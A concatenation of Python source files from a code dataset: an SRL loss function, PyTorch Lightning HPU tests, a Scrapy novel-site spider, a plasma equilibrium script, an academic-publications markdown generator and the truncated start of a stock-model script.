max_num_pred = srl_scores.size()[2]\n num_labels = srl_scores.size()[3]\n\n args_mask = self.sequence_mask(num_predicted_args, max_num_arg)\n # print args_mask.sum()\n pred_mask = self.sequence_mask(num_predicted_preds, max_num_pred)\n # print pred_mask.sum()\n srl_loss_mask = Variable((args_mask.unsqueeze(2) == 1) & (pred_mask.unsqueeze(1) == 1))\n\n srl_scores = srl_scores.view(-1, num_labels)\n # print \"srl labels\", torch.sum(srl_labels)\n srl_labels = Variable(srl_labels.view(-1, 1))\n if self.use_cuda:\n srl_labels = srl_labels.cuda()\n # print srl_scores, srl_labels.size()\n output = F.log_softmax(srl_scores, 1) #* Variable(srl_labels.view(-1)).cuda()\n\n negative_log_likelihood_flat = -torch.gather(output, dim=1, index=srl_labels).view(-1)\n # print torch.sum(srl_loss_mask.type(torch.FloatTensor))\n srl_loss_mask = (srl_loss_mask.view(-1) == 1).nonzero().view(-1)\n # print srl_loss_mask.size()\n # print negative_log_likelihood_flat\n negative_log_likelihood = torch.gather(negative_log_likelihood_flat, dim=0, index=srl_loss_mask)\n # negative_log_likelihood = negative_log_likelihood_flat.view(*srl_labels.size()) # [B, T]\n # negative_log_likelihood = negative_log_likelihood_flat * srl_loss_mask.view(-1).float()\n # print negative_log_likelihood\n # z = ((torch.ones_like(negative_log_likelihood) * 75217952 - negative_log_likelihood) != 0).nonzero()\n # print z\n # print negative_log_likelihood.view(-1).index_select(dim=0, index=z.view(-1))\n loss = negative_log_likelihood.sum()\n return loss\n\n def get_srl_softmax_loss1(self, srl_scores, srl_labels, num_predicted_args, num_predicted_preds):\n \"\"\"Softmax loss with 2-D masking (for SRL).\n Args:\n srl_scores: [num_sentences, max_num_args, max_num_preds, num_labels]\n srl_labels: [num_sentences, max_num_args, max_num_preds]\n num_predicted_args: [num_sentences]\n num_predicted_preds: [num_sentences]\n \"\"\"\n\n max_num_args = self.shape(srl_scores, 1)\n max_num_preds = self.shape(srl_scores, 2)\n num_labels = self.shape(srl_scores, 3)\n args_mask = self.sequence_mask(num_predicted_args, max_num_args) # [num_sentences, max_num_args]\n preds_mask = self.sequence_mask(num_predicted_preds, max_num_preds) # [num_sentences, max_num_preds]\n # args_mask.unsqueeze(2) # [num_sentences, max_num_args, 1]\n # preds_mask.unsqueeze(1) # [num_sentences, 1, max_num_preds]\n srl_loss_mask = args_mask.unsqueeze(2) & preds_mask.unsqueeze(1) # [num_sentences, max_num_args, max_num_preds]\n logp = torch.nn.functional.log_softmax(srl_scores.view(-1, num_labels)[srl_loss_mask.view(-1)])\n srl_labels_masked = Variable(srl_labels.view(-1)[srl_loss_mask.view(-1)].view(-1, 1))\n if self.use_cuda:\n srl_labels_masked = srl_labels_masked.cuda()\n logpy = torch.gather(logp, 1, srl_labels_masked.long())\n loss = -(logpy).sum()\n # loss = F.cross_entropy(\n # input=srl_scores.view(-1, num_labels),\n # target=srl_labels.view(-1).long()\n # ) # [num_sentences * max_num_args * max_num_preds]\n # loss = tf.boolean_mask(loss, srl_loss_mask.view(-1))\n # loss.set_shape([None])\n # loss = tf.reduce_sum(loss)\n return loss","sub_path":"driver/ORLModel.py","file_name":"ORLModel.py","file_ext":"py","file_size_in_byte":50527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"296802289","text":"# Copyright The PyTorch Lightning team.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# 
http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pytest\nimport torch\n\nfrom pytorch_lightning import Callback, LightningModule, Trainer\nfrom pytorch_lightning.demos.boring_classes import BoringModel\nfrom pytorch_lightning.plugins import HPUPrecisionPlugin\nfrom pytorch_lightning.strategies.single_hpu import SingleHPUStrategy\nfrom tests_pytorch.helpers.runif import RunIf\n\n\n@pytest.fixture\ndef hmp_params(request):\n return {\n \"opt_level\": \"O1\",\n \"verbose\": False,\n \"bf16_file_path\": request.config.getoption(\"--hmp-bf16\"),\n \"fp32_file_path\": request.config.getoption(\"--hmp-fp32\"),\n }\n\n\n@RunIf(hpu=True)\ndef test_precision_plugin(hmp_params):\n plugin = HPUPrecisionPlugin(precision=\"bf16\", **hmp_params)\n assert plugin.precision == \"bf16\"\n\n\n@RunIf(hpu=True)\ndef test_mixed_precision(tmpdir, hmp_params: dict):\n class TestCallback(Callback):\n def setup(self, trainer: Trainer, pl_module: LightningModule, stage: str) -> None:\n assert trainer.strategy.model.precision == \"bf16\"\n raise SystemExit\n\n model = BoringModel()\n trainer = Trainer(\n default_root_dir=tmpdir,\n fast_dev_run=True,\n accelerator=\"hpu\",\n devices=1,\n plugins=[HPUPrecisionPlugin(precision=\"bf16\", **hmp_params)],\n callbacks=TestCallback(),\n )\n assert isinstance(trainer.strategy, SingleHPUStrategy)\n assert isinstance(trainer.strategy.precision_plugin, HPUPrecisionPlugin)\n assert trainer.strategy.precision_plugin.precision == \"bf16\"\n with pytest.raises(SystemExit):\n trainer.fit(model)\n\n\n@RunIf(hpu=True)\ndef test_pure_half_precision(tmpdir, hmp_params: dict):\n class TestCallback(Callback):\n def on_train_start(self, trainer: Trainer, pl_module: LightningModule) -> None:\n assert trainer.strategy.model.precision == \"16\"\n for param in trainer.strategy.model.parameters():\n assert param.dtype == torch.float16\n raise SystemExit\n\n model = BoringModel()\n model = model.half()\n trainer = Trainer(\n default_root_dir=tmpdir,\n fast_dev_run=True,\n accelerator=\"hpu\",\n devices=1,\n plugins=[HPUPrecisionPlugin(precision=16, **hmp_params)],\n callbacks=TestCallback(),\n )\n\n assert isinstance(trainer.strategy, SingleHPUStrategy)\n assert isinstance(trainer.strategy.precision_plugin, HPUPrecisionPlugin)\n assert trainer.strategy.precision_plugin.precision == \"16\"\n\n with pytest.raises(RuntimeError, match=r\"float16/half is not supported on Gaudi.\"):\n trainer.fit(model)\n\n\n@RunIf(hpu=True)\ndef test_unsupported_precision_plugin():\n with pytest.raises(ValueError, match=r\"accelerator='hpu', precision='mixed'\\)` is not supported.\"):\n HPUPrecisionPlugin(precision=\"mixed\")\n","sub_path":"tests/tests_pytorch/plugins/precision/hpu/test_hpu.py","file_name":"test_hpu.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"126396259","text":"#!/usr/bin/python\n# coding: utf-8\n\nimport re\nimport scrapy\nfrom bs4 import BeautifulSoup\nfrom scrapy.http import Request # 跟进URL的时候用\nfrom dingdian_scrapy.items import DingdianScrapyItem, DcontentItem\nfrom dingdian_scrapy.mysqlpipelines.sql import Sql\n\n\nclass Myspider(scrapy.Spider):\n \"\"\"\n 
    The class that defines the spider's methods; inherits from scrapy.Spider.\n    start_requests\n    parse\n    get_name\n    get_chapterurl\n    get_chaptercontent\n    \"\"\"\n    name = 'dingdian'  # matches the third argument in entrypoint.py; the name must be unique across the whole project\n    allowed_domains = ['23us.com']  # crawl rule: only URLs under this domain are followed\n    bash_url = 'http://www.23us.com/class/'  # base url of the category pages\n    bashurl = '.html'  # suffix used when building urls\n\n    def start_requests(self):\n        \"\"\"\n        Build the URLs of the discovered novel categories.\n        Essay & poetry example: http://www.23wx.com/class/9_1.html\n        yield turns the function into a generator that returns one iterable object at a time.\n        Request uses a callback; the response of the request is passed as an argument to self.parse.\n        \"\"\"\n        for i in range(1, 11):\n            # build the URL for each category\n            url = self.bash_url + str(i) + '_1' + self.bashurl\n            # follow the URL with Request (the returned response is passed to self.parse; that is the callback!)\n            yield Request(url, callback=self.parse)\n\n    def parse(self, response):\n        \"\"\"\n        Extract the maximum page number, build the URLs and walk all pages of this category.\n        The callback processes the response to get the novel names.\n        \"\"\"\n        # extract the maximum page number\n        max_num = BeautifulSoup(response.text, 'lxml').find(\n            'div', class_='pagelink').find_all('a')[-1].get_text()\n        # print the URL of the response\n        print(response.url)\n        # corresponds to the URL built in start_requests; cut off the last seven characters\n        # http://www.23wx.com/class/9(_1.html)\n        bashurl = str(response.url)[:-7]\n        # walk all pages\n        for num in range(1, int(max_num) + 1):\n            url = bashurl + '_' + str(num) + self.bashurl\n            yield Request(url, callback=self.get_name)\n        \"\"\"\n        yield Request requests a new URL; the callback names whichever\n        function should handle the return value, and the return value is\n        passed to the called function as an argument.\n        \"\"\"\n\n    def get_name(self, response):\n        \"\"\"\n        Extract each novel's name and link and pass them to self.get_chapterurl.\n        The meta dict carries Scrapy's extra data along.\n        \"\"\"\n        # use BeautifulSoup to extract all tr tags with matching attributes\n        tds = BeautifulSoup(response.text, 'lxml').find_all(\n            'tr', bgcolor='#FFFFFF')\n        # walk the tags to get each novel's name and url\n        for td in tds:\n            novelname = td.find('a').get_text()\n            novelurl = td.find('a')['href']\n            # the meta dict is Scrapy's way of passing extra data along\n            yield Request(novelurl,\n                          callback=self.get_chapterurl,\n                          meta={'name': novelname, 'url': novelurl})\n\n    def get_chapterurl(self, response):\n        \"\"\"\n        Store all the requested data in a DingdianScrapyItem instance and return the item (an iterable) for the pipelines.\n        Then request the chapter list URL, which is handled by self.get_chapter.\n        \"\"\"\n        # instantiate DingdianScrapyItem(), the data model defined beforehand\n        item = DingdianScrapyItem()\n        # strip the non-breaking spaces and store the result in the item's name field\n        item['name'] = str(response.meta['name']).replace(\n            '\\\xa0', '')\n        # store the data in the matching item field\n        item['novelurl'] = response.meta['url']\n        # extract the novel's serialization status\n        serialstatus = BeautifulSoup(response.text, 'lxml').find(\n            'table').find_all('td')[2].get_text()\n        # extract the novel's current word count\n        serialnumber = BeautifulSoup(response.text, 'lxml').find(\n            'table').find_all('td')[4].get_text()\n        # extract the novel's category\n        category = BeautifulSoup(response.text, 'lxml').find(\n            'table').find('a').get_text()\n        # extract the novel's author\n        author = BeautifulSoup(response.text, 'lxml').find(\n            'table').find_all('td')[1].get_text()\n        # extract the novel's reading URL (all chapters)\n        bash_url = BeautifulSoup(response.text, 'lxml').find(\n            'p', class_='btnlinks').find('a', class_='read')['href']\n        # get the novel's id\n        name_id = str(bash_url)[-6:-1].replace('/', '')\n        # store the data in the matching item fields\n        item['serialstatus'] = str(serialstatus).strip()\n        item['serialnumber'] = str(serialnumber).strip()\n        item['category'] = str(category).replace('/', '')\n        item['author'] = str(author).replace('/', '').strip()\n        item['name_id'] = name_id\n        # all DingdianScrapyItem fields have been collected; yield the item (an iterable) for the pipelines and keep going\n        yield item\n        # request the chapter list URL; the response is handled by self.get_chapter\n        yield Request(\n            url=bash_url,\n            callback=self.get_chapter,\n            meta={'name_id': name_id})\n\n    def get_chapter(self, response):\n        \"\"\"\n        Extract all chapter URLs and names with a regex.\n        Walk the results and deduplicate against the database.\n        Chapters that are not stored yet are requested.\n        \"\"\"\n        # extract each chapter's URL and name with a regular expression\n        # (pattern reconstructed from context; the original tag markup was stripped from this copy)\n        urls = re.findall(\n            r'<td class=\"L\"><a href=\"(.*?)\">(.*?)</a></td>', response.text)\n        # scrapy is asynchronous, so keep our own counter to preserve the chapter order\n        num = 0\n        # walk the groups of the regex result\n        for url in urls:\n            num += 1\n            # url[0] is the chapter in id.html form, so the full URL has to be built\n            chapterurl = response.url + url[0]\n            # url[1], the second field, is the chaptername\n            chaptername = url[1]\n            # ask the database whether chapterurl already exists\n            rets = Sql.select_chapter(chapterurl)\n            # a result of 1 means the chapter is already stored\n            if rets[0] == 1:\n                print('chapter already exists')\n                pass\n            # otherwise request the chapter content\n            else:\n                yield Request(chapterurl,\n                              callback=self.get_chaptercontent,\n                              meta={'num': num,\n                                    'name_id': response.meta['name_id'],\n                                    'chaptername': chaptername,\n                                    'chapterurl': chapterurl})\n\n    def get_chaptercontent(self, response):\n        \"\"\"\n        Instantiate DcontentItem to hold the chapter's related info and content.\n        Return the result directly; one complete pass returns the final result for the pipelines.\n        \"\"\"\n        # DcontentItem is the other scrapy data structure, holding the chapter content and related info\n        item = DcontentItem()\n        # value of the chapter counter\n        item['num'] = response.meta['num']\n        # still the novel id, not the chapter id\n        item['id_name'] = response.meta['name_id']\n        # chapter name\n        item['chaptername'] = str(\n            response.meta['chaptername']).replace('\\\xa0', '')\n        # chapter URL\n        item['chapterurl'] = response.meta['chapterurl']\n        # extract the chapter content\n        content = BeautifulSoup(response.text, 'lxml').find(\n            'dd', id='contents').get_text()\n        item['chaptercontent'] = str(content).replace('\\\xa0', '')\n        # return the DcontentItem item; no yield needed, the chapter content for this pass is complete\n        return item\n","sub_path":"spider/dingdian_scrapy/dingdian_scrapy/spiders/dingdian.py","file_name":"dingdian.py","file_ext":"py","file_size_in_byte":7754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"368473904","text":"from __future__ import print_function, division, absolute_import, unicode_literals\nfrom pleiades.helpers import *\nfrom pleiades.core import ZSymmCoilSet\nfrom pleiades.wipplsystems import BRB,Dipole\nfrom pleiades.grids import RectGrid\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib import ticker\nfrom matplotlib.collections import PatchCollection\nimport matplotlib.colors as colors\nimport os\nfrom pleiades.math import get_gpsi\nfrom pleiades.eq_solve import compute_equilibrium\nfrom pleiades.io import write_eqdsk\n\n# build grid\nRZgrid = RectGrid((0,1,257),(-.5,.5,257))\nR,Z = RZgrid.R, RZgrid.Z\n\n# build brb vessel and specify current values, patch masks, etc\ntrex_cur = 2000\nmir_cur = 80000*1.2\n#mir_cur = 160000\nbrb = BRB()\n#brb.trex.Ncoil.z0 = .4\n#brb.trex.Scoil.z0 = -.4\nbrb.trex.currents = [trex_cur,trex_cur]\nbrb.ltrx.currents = [0,0]\nbrb.vessel_mags.currents = [0,0,0]\nmirror_set = ZSymmCoilSet(r0=0.15,z0=0.55,nr=11,nz=5,dr=.01,dz=.01)\nbrb.add_component(mirror_set,\"mirrors\")\nbrb.mirrors.currents = [mir_cur,mir_cur]\n\n# set the brb grid (does all greens functions calculations right here)\nbrb.grid = RZgrid\n\n# force psi_lim through rlim1,zlim1 and rlim2,zlim2\nrlim1,zlim1 = 0.08,0.5\nrlim2,zlim2 = 0.6,0.0\nr1idx,z1idx = np.abs(R[0,:]-rlim1).argmin(), np.abs(Z[:,0]-zlim1).argmin()\nr2idx,z2idx = np.abs(R[0,:]-rlim2).argmin(), np.abs(Z[:,0]-zlim2).argmin()\ngm1,gm2 = np.sum(brb.mirrors.gpsi,axis=-1).reshape(R.shape)[z1idx,r1idx], np.sum(brb.mirrors.gpsi,axis=-1).reshape(R.shape)[z2idx,r2idx]\ngc1,gc2 = np.sum(brb.trex.gpsi,axis=-1).reshape(R.shape)[z1idx,r1idx], np.sum(brb.trex.gpsi,axis=-1).reshape(R.shape)[z2idx,r2idx]\ngp1,gp2 = 0, 0\niplas = 0\nnew_trex_cur = -((gm1-gm2)*brb.mirrors.currents[0] + (gp1-gp2)*iplas)/(gc1 - gc2)\nprint(new_trex_cur)\nbrb.trex.currents = [new_trex_cur,new_trex_cur]\n\n# get desired field quantities from brb object\nB = np.sqrt(brb.BR**2+brb.BZ**2)\nBR = brb.BR\nBZ = brb.BZ\npsi = brb.psi\npsi_lim = locs_to_vals(R,Z,psi,[(rlim1,zlim1)])[0]\npsi_space = np.linspace(0,psi_lim,11)\n\n# setup pressure profile and compute P0 for a
given desired initial beta\na = .6\nalpha = 2.0\nbeta0 = .00001\nB0 = locs_to_vals(R,Z,B,[(0,0)])[0]\nP0 = beta0*B0**2/(2*4*np.pi*1E-7)\nprint(\"pressure \", P0)\n# build pressure function of cylindrical radius\nPfunc = lambda x: P0*(1-(x/a)**2)**alpha if x < a else 0\n# get greens function for plasma currents\ngplas = get_gpsi(R,Z)\n# compute equilibrium\npsieq,plas_currents,pfit = compute_equilibrium(R,Z,Pfunc,psi,gplas,maxiter=400,plotit=False)\nwrite_eqdsk(R,Z,psi,plas_currents,\"mfnpeqdsk.txt\",\"MFNP_Mirror Equilib\")\nP = pfit(psi.flatten()).reshape(psi.shape)\njphi = plas_currents/((R[0,1]-R[0,0])*(Z[1,0]-Z[0,0]))\n\nfig,ax = plt.subplots()\ncf = ax.contourf(R,Z,jphi,101)\ncs = ax.contour(R,Z,psieq,psi_space,colors=\"k\",lw=2)\nfor clev in psi_space:\n flpts = get_fieldlines(cs,clev,start_coord=(0.05,.5),end_coord=(0.05,-0.5),clockwise=True)\n ax.plot(flpts[:,0],flpts[:,1],\"bo\")\n ax.plot(flpts[0,0],flpts[0,1],\"go\")\n ax.plot(flpts[-1,0],flpts[-1,1],\"ro\")\n\nplt.colorbar(cf)\nplt.show()\n\n\n#### Plotting \n# plot slice of Bz as function of Z at R=0\nridx = np.abs(R[0,:]).argmin()\nplt.plot(Z[:,ridx],BZ[:,ridx])\nplt.plot(Z[:,ridx],BR[:,ridx])\nplt.show()\n\n# plot BRB with patches and stuff\nfig,ax = plt.subplots(figsize=(10,8))\ncf = ax.contourf(R,Z,B,101,cmap=\"rainbow\",locator=ticker.LogLocator(),zorder=0)\ncs = ax.contour(R,Z,psi,51,colors='k',lw=2,zorder=1)\ncs1 = ax.contour(R,Z,psieq,51,colors='g',lw=2,zorder=1)\ncs = ax.contour(R,Z,psi,(psi_lim,),colors='r',lw=2,zorder=1)\ncs = ax.contour(R,Z,psi,(7629.87E-8,),colors='b',lw=2,zorder=1)\ncbar = fig.colorbar(cf)\ncbar.set_label(\"B (G)\",fontsize=16)\nax.set_xlim(0,1.0)\nax.set_ylabel(\"Z (m)\")\nax.set_xlabel(\"R (m)\")\nax.set_ylim(-.5,.5)\nax.set_aspect('equal')\npatches = brb.patches\nax.add_collection(PatchCollection(patches,match_original=True))\nplt.show()\n","sub_path":"tests/eq_tester.py","file_name":"eq_tester.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"173414765","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Publications markdown generator for academicpages\n#\n# Takes a set of bibtex of publications and converts them for use with [academicpages.github.io](academicpages.github.io). 
This is an interactive Jupyter notebook ([see more info here](http://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/what_is_jupyter.html)).\n#\n# The core python code is also in `pubsFromBibs.py`.\n# Run either from the `markdown_generator` folder after updating the publist dictionary with:\n# * bib file names\n# * specific venue keys based on your bib file preferences\n# * any specific pre-text for specific files\n# * Collection Name (future feature)\n#\n# TODO: Make this work with other databases of citations,\n# TODO: Merge this with the existing TSV parsing solution\n\n\nfrom pybtex.database.input import bibtex\nimport pybtex.database.input.bibtex\nfrom time import strptime\nimport string\nimport html\nimport os\nimport re\n\n# Build a .bib file from the individual bib entries in files/bib:\nfrom pathlib import Path\nparentdir = str(Path(os.getcwd()).parent.absolute())\nwith open(\"proceedings.bib\", \"w\") as procfile, open(\"pubs.bib\", \"w\") as pubsfile, open(\"dissertation.bib\", \"w\") as dissertationfile:\n    for bib_file in os.listdir(parentdir + '/files/bib'):\n        with open(parentdir + '/files/bib/' + bib_file, 'r') as bf:\n            lines = bf.readlines()\n        if lines[0].strip().startswith('@inproceedings'):\n            procfile.writelines(lines)\n        elif lines[0].strip().startswith('@article'):\n            pubsfile.writelines(lines)\n        elif lines[0].strip().startswith('@phdthesis'):\n            dissertationfile.writelines(lines)\n\n#todo: incorporate different collection types rather than a catch all publications, requires other changes to template\npublist = {\n    \"proceeding\": {\n        \"file\" : \"proceedings.bib\",\n        \"authorkey\": \"author\",\n        \"venuekey\": \"booktitle\",\n        \"venue-pretext\": \"\",\n        \"links\": \"\",\n        \"collection\" : {\"name\":\"publications\",\n                        \"permalink\":\"/publication/\"}\n\n    },\n    \"journal\":{\n        \"file\": \"pubs.bib\",\n        \"authorkey\": \"author\",\n        \"venuekey\" : \"journal\",\n        \"venue-pretext\" : \"\",\n        \"collection\" : {\"name\":\"publications\",\n                        \"permalink\":\"/publication/\"}\n    },\n    \"dissertation\":{\n        \"file\": \"dissertation.bib\",\n        \"authorkey\": \"author\",\n        \"venuekey\" : \"school\",\n        \"venue-pretext\" : \"\",\n        \"collection\" : {\"name\":\"publications\",\n                        \"permalink\":\"/publication/\"}\n    }\n}\n\n# map each special character to its HTML entity\nhtml_escape_table = {\n    \"&\": \"&amp;\",\n    '\"': \"&quot;\",\n    \"'\": \"&apos;\"\n    }\n\ndef html_escape(text):\n    \"\"\"Produce entities within text.\"\"\"\n    return \"\".join(html_escape_table.get(c,c) for c in text)\n\n\nfor pubsource in publist:\n    parser = bibtex.Parser()\n    bibdata = parser.parse_file(publist[pubsource][\"file\"])\n\n    #loop through the individual references in a given bibtex file\n    for bib_id in bibdata.entries:\n        #reset default date\n        pub_year = \"1900\"\n        pub_month = \"01\"\n        pub_day = \"01\"\n\n        b = bibdata.entries[bib_id].fields\n\n        try:\n            pub_year = f'{b[\"year\"]}'\n\n            #todo: this hack for month and day needs some cleanup\n            if \"month\" in b.keys():\n                if(len(b[\"month\"])<3):\n                    pub_month = \"0\"+b[\"month\"]\n                    pub_month = pub_month[-2:]\n                elif(b[\"month\"] not in range(12)):\n                    tmnth = strptime(b[\"month\"][:3],'%b').tm_mon\n                    pub_month = \"{:02d}\".format(tmnth)\n                else:\n                    pub_month = str(b[\"month\"])\n            if \"day\" in b.keys():\n                pub_day = str(b[\"day\"])\n\n\n            pub_date = pub_year+\"-\"+pub_month+\"-\"+pub_day\n\n            #strip out {} as needed (some bibtex entries that maintain formatting)\n            clean_title = b[\"title\"].replace(\"{\", \"\").replace(\"}\",\"\").replace(\"\\\\\",\"\").replace(\" \",\"-\")\n\n            url_slug = re.sub(\"\\\\[.*\\\\]|[^a-zA-Z0-9_-]\",
\"\", clean_title)\n url_slug = url_slug.replace(\"--\",\"-\")\n\n md_filename = (str(pub_date) + \"-\" + url_slug + \".md\").replace(\"--\",\"-\")\n html_filename = (str(pub_date) + \"-\" + url_slug).replace(\"--\",\"-\")\n\n #Build Citation from text\n citation = \"\"\n\n #citation authors - todo - add highlighting for primary author?\n authors = \"\"\n for author in bibdata.entries[bib_id].persons[\"author\"]:\n authors = authors+\" \"+author.first_names[0]+\" \"+author.last_names[0].replace('{', '').replace('}', '')+\", \"\n authors = authors[:-2]\n citation += authors\n\n #citation title\n citation = citation + \"\\\"\" + html_escape(b[\"title\"].replace(\"{\", \"\").replace(\"}\",\"\").replace(\"\\\\\",\"\")) + \".\\\"\"\n\n #add venue logic depending on citation type\n venue = publist[pubsource][\"venue-pretext\"]+b[publist[pubsource][\"venuekey\"]].replace(\"{\", \"\").replace(\"}\",\"\").replace(\"\\\\\",\"\")\n\n citation = citation + \" \" + html_escape(venue)\n citation = citation + \", \" + pub_year + \".\"\n\n\n ## YAML variables\n md = \"---\\ntitle: \\\"\" + html_escape(b[\"title\"].replace(\"{\", \"\").replace(\"}\",\"\").replace(\"\\\\\",\"\")) + '\"\\n'\n\n md += \"\"\"collection: \"\"\" + publist[pubsource][\"collection\"][\"name\"]\n\n md += \"\"\"\\npermalink: \"\"\" + publist[pubsource][\"collection\"][\"permalink\"] + html_filename\n\n note = False\n if \"note\" in b.keys():\n if len(str(b[\"note\"])) > 5:\n md += \"\\nexcerpt: '\" + html_escape(b[\"note\"]) + \"'\"\n note = True\n\n md += \"\\ndate: \" + str(pub_date)\n\n md += \"\\nyear: \" + str(pub_year)\n\n md += \"\\nauthor: '\" + html_escape(authors) + \"'\"\n\n md += \"\\nvenue: '\" + html_escape(venue) + \"'\"\n\n if 'abstract' in bibdata.entries[bib_id].fields:\n md += \"\\nabstract: '\" + html_escape(bibdata.entries[bib_id].fields['abstract']) + \"'\"\n\n url = False\n if \"url\" in b.keys():\n if len(str(b[\"url\"])) > 5:\n md += \"\\npaperurl: '\" + b[\"url\"] + \"'\"\n url = True\n\n # Check for the availability of pdf, slides, video, code\n paper_available = False\n paper_url = \"\"\n paperdir = parentdir + '/files/papers'\n if bib_id + '.txt' in os.listdir(paperdir):\n paper_available = True\n paper_url = open(paperdir + '/' + bib_id + '.txt').readlines()[0].strip()\n elif bib_id + '.pdf' in os.listdir(paperdir):\n paper_available = True\n paper_url = 'https://github.com/hanxiao0607/hanxiao0607.github.io/raw/master/files/papers/{id}.pdf'.format(id=bib_id)\n else:\n print(\"WARNING: no paper pdf available for\", bib_id)\n\n slides_available = False\n slides_url = \"\"\n slidesdir = parentdir + '/files/slides'\n if bib_id + '.txt' in os.listdir(slidesdir):\n slides_available = True\n slides_url = open(slidesdir + '/' + bib_id + '.txt').readlines()[0].strip()\n elif bib_id + '.pdf' in os.listdir(slidesdir):\n slides_available = True\n slides_url = 'https://github.com/hanxiao0607/hanxiao0607.github.io/raw/master/files/slides/{id}.pdf'.format(id=bib_id)\n else:\n print(\"WARNING: no slides pdf available for\", bib_id)\n\n video_available = False\n video_url = \"\"\n videodir = parentdir + '/files/video'\n if bib_id + '.txt' in os.listdir(videodir):\n video_available = True\n video_url = open(videodir + '/' + bib_id + '.txt').readlines()[0].strip()\n\n poster_available = False\n poster_url = \"\"\n posterdir = parentdir + '/files/posters'\n if bib_id + '.txt' in os.listdir(posterdir):\n poster_available = True\n poster_url = open(posterdir + '/' + bib_id + '.txt').readlines()[0].strip()\n elif bib_id + 
'.pdf' in os.listdir(posterdir):\n poster_available = True\n poster_url = 'https://github.com/hanxiao0607/hanxiao0607.github.io/raw/master/files/posters/{id}.pdf'.format(id=bib_id)\n\n code_available = False\n code_url = \"\"\n codedir = parentdir + '/files/code'\n if bib_id + '.txt' in os.listdir(codedir):\n code_available = True\n code_url = open(codedir + '/' + bib_id + '.txt').readlines()[0].strip()\n\n # Create links for these materials\n available_material = []\n if paper_available:\n available_material.append(('pdf', paper_url))\n if slides_available:\n available_material.append(('slides', slides_url))\n if poster_available:\n available_material.append(('poster', poster_url))\n if video_available:\n available_material.append(('video', video_url))\n if code_available:\n available_material.append(('code', code_url))\n available_material.append(('bib', 'https://github.com/hanxiao0607/hanxiao0607.github.io/tree/master/files/bib/{id}.bib'.format(id=bib_id)))\n links = \"\\nlinks: \"\n # links += \", \".join([\"\" + text + \"\" for (text, text_url) in available_material])\n links_list = []\n for (text, text_url) in available_material:\n if text_url.endswith('.bib') or text_url.endswith('.pdf'):\n links_list.append(\"\" + text + \"\")\n else:\n links_list.append(\"\" + text + \"\")\n links += \", \".join(links_list)\n links += \"\"\n # links = \"\\nlinks: \\[\"\n # links += \", \".join([\"[\" + text + \"](\" + text_url + \"){:target=\\\"_blank\\\"}\" for (text, text_url) in available_material])\n # links += \"\\]\"\n\n md += links\n\n # links = html_escape(links)\n # publist[pubsource][links] = links\n # md += \"\\ncitation: '\" + html_escape(citation) + \"'\"\n\n md += \"\\n---\"\n\n\n ## Markdown description for individual page\n if note:\n md += \"\\n\" + html_escape(b[\"note\"]) + \"\\n\"\n\n # if url:\n # md += \"\\n[Access paper here](\" + b[\"url\"] + \"){:target=\\\"_blank\\\"}\\n\"\n # else:\n # md += \"\\nUse [Google Scholar](https://scholar.google.com/scholar?q=\"+html.escape(clean_title.replace(\"-\",\"+\"))+\"){:target=\\\"_blank\\\"} for full citation\"\n\n\n\n md_filename = os.path.basename(md_filename)\n\n with open(\"../_publications/\" + md_filename, 'w') as f:\n f.write(md)\n # f.write(links)\n print(f'SUCESSFULLY PARSED {bib_id}: \\\"', b[\"title\"][:60],\"...\"*(len(b['title'])>60),\"\\\"\")\n # field may not exist for a reference\n except KeyError as e:\n print(f'WARNING Missing Expected Field {e} from entry {bib_id}: \\\"', b[\"title\"][:30],\"...\"*(len(b['title'])>30),\"\\\"\")\n continue\n","sub_path":"markdown_generator/pubsFromBib.py","file_name":"pubsFromBib.py","file_ext":"py","file_size_in_byte":11523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"242270965","text":"from data_ops import *\nfrom model import *\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\nimport datetime as dt\nimport pandas as pd\nimport os\nimport json\n\nmatplotlib.rc('font',**{'family':'monospace'})\nmatplotlib.rcParams['mathtext.fontset'] = 'dejavusans'\n\nif __name__ == \"__main__\":\n if (len(sys.argv) == 3):\n\n stock_name = sys.argv[1]\n model_name = sys.argv[2]\n\n view_length_1 = 14\n view_length_2 = 60\n evaluate_performance = True\n\n normalize = True\n interval_min = -3*356\n interval_max = None\n\n abs_dir = os.path.dirname(os.path.realpath(__file__))\n data_columns 
